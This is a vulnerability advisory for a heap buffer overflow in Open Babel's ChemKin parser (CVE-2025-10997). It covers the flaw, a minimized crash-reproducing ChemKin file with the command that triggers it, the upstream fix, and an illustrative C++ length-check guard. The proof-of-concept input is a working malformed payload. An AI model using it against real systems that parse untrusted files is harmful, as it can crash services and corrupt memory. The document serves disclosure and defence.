CVE-2025-10997: Open Babel Heap Buffer Overflow in ChemKin Parser
A crafted ChemKin reaction file can corrupt heap memory in Open Babel's species-lookup code, crashing any application that parses untrusted chemistry files.
The problem
The function `ChemKinFormat::CheckSpecies` in `src/formats/chemkinformat.cpp` reads species tokens from a ChemKin REACTIONS block and passes them directly into a `std::map::find` call with no length or bounds validation.
An oversized or malformed species token corrupts the internal string buffer used as the map key. Under ASAN the crash is a heap-buffer-overflow READ of 8 bytes past the allocation boundary, inside `std::map::find` at `stl_map.h:1170`. The overflow is reachable from `ReadReactionQualifierLines`, which calls `CheckSpecies` for every species token on a reaction line.
Proof of concept
A working proof-of-concept for CVE-2025-10997 in openbabel, with the exact payload below.
! Minimized ChemKin reproducer for CVE-2025-10997
! Save as crash.ck and run: obabel -i ck crash.ck -o smi
ELEMENTS
H O N C
END
SPECIES
H2 O2 H2O
END
REACTIONS
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+H2O=H2+OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO 1.0E+13 0.0 0.0
END

The ChemKin format uses fixed-column-width fields (16 chars per species name in the canonical spec). Before the patch, `CheckSpecies` performed no length guard: it took the raw parsed token string and used it as a `std::map<std::string, ...>::find` key. When the token was much longer than the internally allocated SSO threshold or any assumed field width, the `std::string` construction itself or a prior `strncpy`-style copy into a fixed heap buffer wrote past the allocation boundary, corrupting adjacent heap metadata.
The fix (commit af4a4212, consolidated in PR #2913) added an explicit length check, rejecting any species token that exceeds the valid field width before it touches the map. CWE-122 (Heap-based Buffer Overflow) applies directly.
The fix
Upgrade to Open Babel 3.2.0 (released 2026-05-26), which contains the fix in commit af4a4212 via PR #2913. If upgrading is not immediately possible, avoid exposing `obabel`, `OBConversion`, or any language binding to untrusted ChemKin files. Distributions shipping 3.1.1 (Debian, Ubuntu, etc.) should apply the distro security patch referenced in the advisory.
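For deployments that cannot upgrade yet, a pre-parse guard in the spirit of the patch can be applied to ChemKin input before it reaches `obabel` or `OBConversion`. The code below is an added example, not Open Babel's code and not the change from commit af4a4212; it assumes the 16-character field width from the canonical spec, and the names `firstOversizedSpeciesLine`, `speciesTokens` and `kMaxSpeciesLen` as well as the separator handling are this example's own.

```cpp
#include <cstddef>
#include <sstream>
#include <string>
#include <vector>

// Canonical ChemKin species-name field width cited in the advisory.
constexpr std::size_t kMaxSpeciesLen = 16;

// Split "2OH+H2(+M)<=>H2O+H(+M)" on ChemKin separators, dropping leading
// stoichiometric coefficients so "2<16-char species>" is not mis-measured.
std::vector<std::string> speciesTokens(const std::string& expr) {
    std::vector<std::string> out;
    std::string cur;
    auto flush = [&]() {
        std::size_t start = cur.find_first_not_of("0123456789.");
        if (start != std::string::npos) out.push_back(cur.substr(start));
        cur.clear();
    };
    for (char c : expr) {
        if (std::string("+=<>()").find(c) != std::string::npos) flush();
        else cur += c;
    }
    flush();
    return out;
}

// Scan the REACTIONS block of an in-memory ChemKin file. Returns 0 if every
// species token fits the field width, else the 1-based line of the first
// oversized token, so the file is rejected before any parser uses that token
// as a map key. The last three fields of a reaction line are the Arrhenius
// parameters; everything before them is the reaction expression.
std::size_t firstOversizedSpeciesLine(const std::string& text) {
    std::istringstream in(text);
    std::string line; bool inReactions = false;
    for (std::size_t lineNo = 1; std::getline(in, line); ++lineNo) {
        std::istringstream fields(line.substr(0, line.find('!')));  // drop comments
        std::vector<std::string> f;
        for (std::string w; fields >> w;) f.push_back(w);
        if (f.empty()) continue;
        if (f[0] == "REACTIONS") { inReactions = true; continue; }
        if (f[0] == "END") { inReactions = false; continue; }
        if (!inReactions) continue;
        std::string expr;
        for (std::size_t i = 0, n = f.size() >= 4 ? f.size() - 3 : f.size(); i < n; ++i) expr += f[i];
        if (expr.find('=') == std::string::npos) continue;  // auxiliary line (LOW/, DUPLICATE, ...)
        for (const std::string& tok : speciesTokens(expr))
            if (tok.size() > kMaxSpeciesLen) return lineNo;
    }
    return 0;
}
```

Call `firstOversizedSpeciesLine` on the file contents and refuse to hand the file to the converter when it returns a non-zero line number.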
Reported by OSS-Fuzz (Google).
Related research
- CVE-2022-43467: Open Babel PQS Parser Out-of-Bounds Write (high, 7.8)
- CVE-2022-43607: Open Babel MOL2 Parser Stack Buffer Overflow (high, 7.8)
- CVE-2022-46289: Open Babel ORCA nAtoms Heap Buffer Overflow (high, 7.8)
- CVE-2022-46290: Open Babel ORCA Parser Heap Buffer Overflow (high, 7.8)